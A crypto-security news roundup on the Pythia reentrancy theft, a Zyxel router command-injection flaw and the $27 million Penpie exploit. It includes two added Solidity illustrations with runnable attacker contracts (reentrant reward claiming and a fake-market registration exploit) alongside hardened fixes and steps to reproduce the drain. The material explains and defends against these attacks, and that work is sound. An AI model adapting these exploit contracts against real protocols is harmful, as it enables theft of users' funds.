2 Auditors Missed $27 Million Penpie Flaw, Pythia’s ‘Claim Reward’ Bug: Crypto-Sec

By Crypto Flexs, September 10, 2024

Pythia reentrancy attack

Pythia Finance, a decentralized finance protocol, had $53,000 stolen via a reentrancy attack on September 3, according to a report from blockchain security firm Quill Audits. Pythia is an algorithmic stablecoin project that aims to manage finances using artificial intelligence.

An attacker collected more rewards than they were entitled to by calling the “Claim Reward” function repeatedly, in a way that prevented the reward balance from being updated between calls.

According to the report, Pythia calls the reward token’s “safe transfer” function when it pays out rewards. Because the attacker controlled a malicious token contract, that transfer called back into Pythia before the claim had finished, Pythia paid out and called the token again, and so on, a chain of nested calls that drained the protocol’s funds before any balance was updated.

Screenshot of the Pythia partial audit report: on the left, the Pythia code containing the vulnerability; on the right, a text description of it. (Pythia/X)

Quill Audits’ partial audit report on Pythia lists no outstanding security issues, suggesting the team has since upgraded its contracts to close the exploit.

Reentrancy attacks are one of the most common types of smart contract exploits: an attacker re-enters a function before its previous invocation has finished executing, typically before it has updated the state that the next call reads.
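The pattern described above, as an added example that is not Pythia’s code and not part of Quill Audits’ report: a reward pool whose claim function pays out before it zeroes the claimant’s balance, a reward token whose transfer hook notifies the recipient, and an attacker that uses that hook to re-enter. The contract and function names (RewardPoolVulnerable, RewardPoolFixed, HookedToken, Attacker, credit, mint, onReward) are invented; only claimReward echoes the function discussed in the text. The hardened pool shows the two standard defences, checks-effects-interactions ordering and a reentrancy lock.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not Pythia's code. Contract and function names
// (RewardPool*, HookedToken, Attacker, credit, mint, onReward) are invented.

interface IRewardToken {
    function transfer(address to, uint256 amount) external returns (bool);
    function balanceOf(address who) external view returns (uint256);
}

interface IRewardPool {
    function claimReward() external;
    function pending(address user) external view returns (uint256);
}

// Vulnerable: the external transfer runs before the claimant's balance is
// zeroed, so a caller that re-enters from the transfer still sees the old value.
contract RewardPoolVulnerable {
    IRewardToken public immutable rewardToken;
    mapping(address => uint256) public pending;

    constructor(IRewardToken token) { rewardToken = token; }
    // Stand-in for the staking logic that accrues rewards.
    function credit(address user, uint256 amount) external { pending[user] += amount; }

    function claimReward() external {
        uint256 amount = pending[msg.sender];
        require(amount > 0, "nothing to claim");
        rewardToken.transfer(msg.sender, amount); // interaction first (the bug)
        pending[msg.sender] = 0;                  // effect last: too late
    }
}

// Hardened: checks-effects-interactions plus a reentrancy lock.
contract RewardPoolFixed {
    IRewardToken public immutable rewardToken;
    mapping(address => uint256) public pending;
    uint256 private _lock = 1;

    modifier nonReentrant() { require(_lock == 1, "reentrant"); _lock = 2; _; _lock = 1; }

    constructor(IRewardToken token) { rewardToken = token; }
    function credit(address user, uint256 amount) external { pending[user] += amount; }

    function claimReward() external nonReentrant {
        uint256 amount = pending[msg.sender];
        require(amount > 0, "nothing to claim");
        pending[msg.sender] = 0;                                              // effect
        require(rewardToken.transfer(msg.sender, amount), "transfer failed"); // interaction
    }
}

// A reward token whose transfer notifies contract recipients. That hook is the
// re-entry point.
interface IRewardReceiver { function onReward(address token) external; }

contract HookedToken is IRewardToken {
    mapping(address => uint256) public override balanceOf;
    // Test helper: fund the pool.
    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }

    function transfer(address to, uint256 amount) external override returns (bool) {
        balanceOf[msg.sender] -= amount; // reverts on underflow once the pool is empty
        balanceOf[to] += amount;
        if (to.code.length > 0) IRewardReceiver(to).onReward(address(this));
        return true;
    }
}

// Attacker: re-enters claimReward from the hook while pending[] is still stale,
// and stops just before the pool can no longer pay (a failed transfer would
// revert the whole chain and undo the theft).
contract Attacker is IRewardReceiver {
    IRewardPool public immutable pool;
    constructor(address pool_) { pool = IRewardPool(pool_); }

    function attack() external { pool.claimReward(); }

    function onReward(address token) external override {
        uint256 amount = pool.pending(address(this)); // pre-claim value on the vulnerable pool
        if (IRewardToken(token).balanceOf(address(pool)) >= amount) {
            pool.claimReward(); // against RewardPoolFixed this reverts with "reentrant"
        }
    }
}
```

Deploy HookedToken, deploy a pool with the token’s address, mint the pool a balance, credit the Attacker contract a small amount and call attack(): against RewardPoolVulnerable the pool’s entire balance ends up in the attacker contract, because each nested claimReward reads the same stale pending value. Against RewardPoolFixed the same attack() reverts, since the hook’s second claimReward hits the lock (and, even without the lock, would find pending already zero).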

Critical vulnerability in Zyxel

On September 4, networking hardware manufacturer Zyxel disclosed that some of its networking equipment had a critical vulnerability that could allow attackers to execute code on users’ routers and access points, potentially giving hackers access to users’ devices.

According to the disclosure, the vulnerability is a result of “improper sanitization of a special element in the parameter ‘host’ of a CGI program” in several different firmware versions. This improper sanitization allows these firmware versions to “allow an unauthenticated attacker to execute OS commands by sending a crafted cookie to a vulnerable device.”

Cryptocurrency wallet users should be especially wary of attacks on their home networks. An attacker who controls a router can redirect the user’s traffic via DNS spoofing, read anything sent over the network unencrypted, or attempt to intercept encrypted connections (which only succeeds if the client can be tricked into trusting an attacker-controlled certificate; deep packet inspection alone cannot decrypt TLS). Whatever is collected can then feed social engineering attacks that convince the user to approve transactions or share their private keys.

Zyxel has provided a list of potentially affected devices, including the NWA50AX PRO, NWA90AX, WAC500 and other access points, as well as the USG LITE 60AX router. The manufacturer has advised users of these devices to upgrade their firmware.

Penpie exploiters created a fake Pendle market

According to a September 4 report from blockchain security firm Zokyo, the $27 million Penpie exploit was possible because of a flaw that allowed any user to create a Pendle Market. The report says Zokyo had audited earlier versions of the protocol, which did not contain the flaw at the time.

According to the report, Penpie includes a function called “registerPenpiePool” that registers new pool addresses and Pendle Markets. To stop malicious markets from being registered, a modifier checks that the Pendle Market is already registered with Pendle Finance’s factory contract; a market the factory does not know is rejected. That check assumes only Pendle can create markets, but the factory’s createNewMarket function is permissionless: any user can call it to register a market of their own with the factory. The report concludes that, in effect, anyone could create and register a Pendle Market with Penpie.

Attackers exploited this vulnerability to create fake Pendle Markets and pools, which were configured to offer valuable Pendle tokens as rewards.

Pendle Finance’s createNewMarket function, used to create new markets. (Zokyo)

The protocol also contained a reentrancy flaw that let the attacker deposit tokens into the pools repeatedly before balances had been updated. Each re-entrant deposit call artificially inflated the rewards credited to the attacker, who then withdrew the deposits and claimed the rewards, draining the protocol of more than $27 million.

According to the report, the reentrancy flaw was present in the version that Zokyo audited, but that version only allowed the protocol team to register new pools and markets, preventing external attackers from exploiting them. The report states:

“The _market parameter received in the batchHarvestMarketRewards(…) method was expected to be non-malicious, as in previous versions of the code audited by Zokyo, only the owner (multi-signature) could register a pool.”

In a separate report published on September 3, the Penpie team said it introduced “permissionless pool registration” about a year after Zokyo’s audit and hired security firm AstraSec to audit the new registration system. That audit’s scope covered only the new contracts. Because the exploit arose from an interaction between two contracts audited by two different teams, neither team caught the vulnerability. Penpie said it will conduct “periodic audits of the entire protocol” in the future to prevent such incidents from happening again.
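The trust boundary described above, as an added example that is not Penpie’s or Pendle’s code: a permissionless factory, a registry whose only gate is the factory’s answer, the hardened registry, and the sequence of calls an attacker needs. Contract and function names (MarketFactory, PoolRegistryVulnerable, PoolRegistryFixed, harvest, harvestDepth, MaliciousMarket, Exploit) are invented; only createNewMarket echoes a name from the text, and the reward-redemption callback is a simplified stand-in for the real harvesting path.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not Penpie's or Pendle's code. MarketFactory, PoolRegistry*,
// harvest, MaliciousMarket and Exploit are invented stand-ins for the
// createNewMarket, registerPenpiePool and batchHarvestMarketRewards paths.

// Permissionless factory: anyone can produce a "valid" market, so factory
// provenance proves where a market came from, not that it is honest.
contract MarketFactory {
    mapping(address => bool) public isValidMarket;

    // A real factory deploys the market itself; what matters here is that the
    // call is open to everyone, so the caller decides what gets marked valid.
    function createNewMarket(address market) external {
        isValidMarket[market] = true;
    }
}

interface IMarket {
    function redeemRewards(address user) external;
}

// Vulnerable registry: the modifier was a real gate while market creation was
// owner-only; once createNewMarket became permissionless it checks nothing useful.
contract PoolRegistryVulnerable {
    MarketFactory public immutable factory;
    mapping(address => bool) public registered;
    uint256 public harvestDepth; // nesting of in-flight harvest calls; should never exceed 1

    constructor(MarketFactory f) { factory = f; }

    modifier onlyPendleMarket(address market) {
        require(factory.isValidMarket(market), "not a Pendle market");
        _;
    }

    function registerPool(address market) external onlyPendleMarket(market) {
        registered[market] = true;
    }

    // Hands control to the market's code mid-transaction with no reentrancy guard.
    function harvest(address market) external {
        require(registered[market], "unregistered");
        harvestDepth += 1;
        IMarket(market).redeemRewards(address(this));
        harvestDepth -= 1;
    }
}

// Hardened: provenance is still checked, but registration needs the owner
// (a multisig in practice) and harvest cannot be re-entered.
contract PoolRegistryFixed {
    address public immutable owner;
    MarketFactory public immutable factory;
    mapping(address => bool) public registered;
    uint256 private _lock = 1;

    constructor(MarketFactory f) { factory = f; owner = msg.sender; }

    modifier onlyOwner() { require(msg.sender == owner, "not owner"); _; }
    modifier nonReentrant() { require(_lock == 1, "reentrant"); _lock = 2; _; _lock = 1; }

    function registerPool(address market) external onlyOwner {
        require(factory.isValidMarket(market), "not a Pendle market");
        registered[market] = true;
    }

    function harvest(address market) external nonReentrant {
        require(registered[market], "unregistered");
        IMarket(market).redeemRewards(address(this));
    }
}

// Attacker-controlled market: when harvested it re-enters the registry. (In the
// incident the re-entry targeted the deposit path; here it re-enters harvest
// once so the nesting is observable.)
contract MaliciousMarket is IMarket {
    bool private reentered;
    uint256 public maxDepthSeen;

    function redeemRewards(address) external override {
        PoolRegistryVulnerable registry = PoolRegistryVulnerable(msg.sender);
        if (!reentered) {
            reentered = true;
            registry.harvest(address(this)); // nested call succeeds: no guard
        }
        uint256 depth = registry.harvestDepth();
        if (depth > maxDepthSeen) maxDepthSeen = depth;
    }
}

// The three calls the attacker needs against the vulnerable registry.
contract Exploit {
    function run(MarketFactory factory, PoolRegistryVulnerable registry) external returns (uint256) {
        MaliciousMarket market = new MaliciousMarket();
        factory.createNewMarket(address(market)); // 1. become a "valid" Pendle market
        registry.registerPool(address(market));   // 2. the modifier passes
        registry.harvest(address(market));        // 3. registry now runs attacker code
        // Against PoolRegistryFixed, step 2 reverts with "not owner".
        return market.maxDepthSeen();             // 2: harvest was re-entered
    }
}
```

Deploy MarketFactory and PoolRegistryVulnerable, then call Exploit.run(): it returns 2, showing that harvest was entered while another harvest was still in flight. The fix is not to check the factory harder; the factory check remains a fine provenance filter. The point is that a check whose outcome the attacker controls cannot be the only gate, which is why registration goes back behind the owner, and why the path that calls into a market gets its own reentrancy guard regardless of how the market was registered.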

Penpie is a decentralized finance protocol that offers yield boosting to Pendle Finance users. The exploit occurred on September 3.

Christopher Locke

Some say he is a white hat hacker living in the black mining hills of Dakota, pretending to be a children’s crossing guard to avoid the NSA’s eyes. What we do know is that Christopher Locke has a pathological desire to hunt scammers and hackers.

© 2026 Crypto Flexs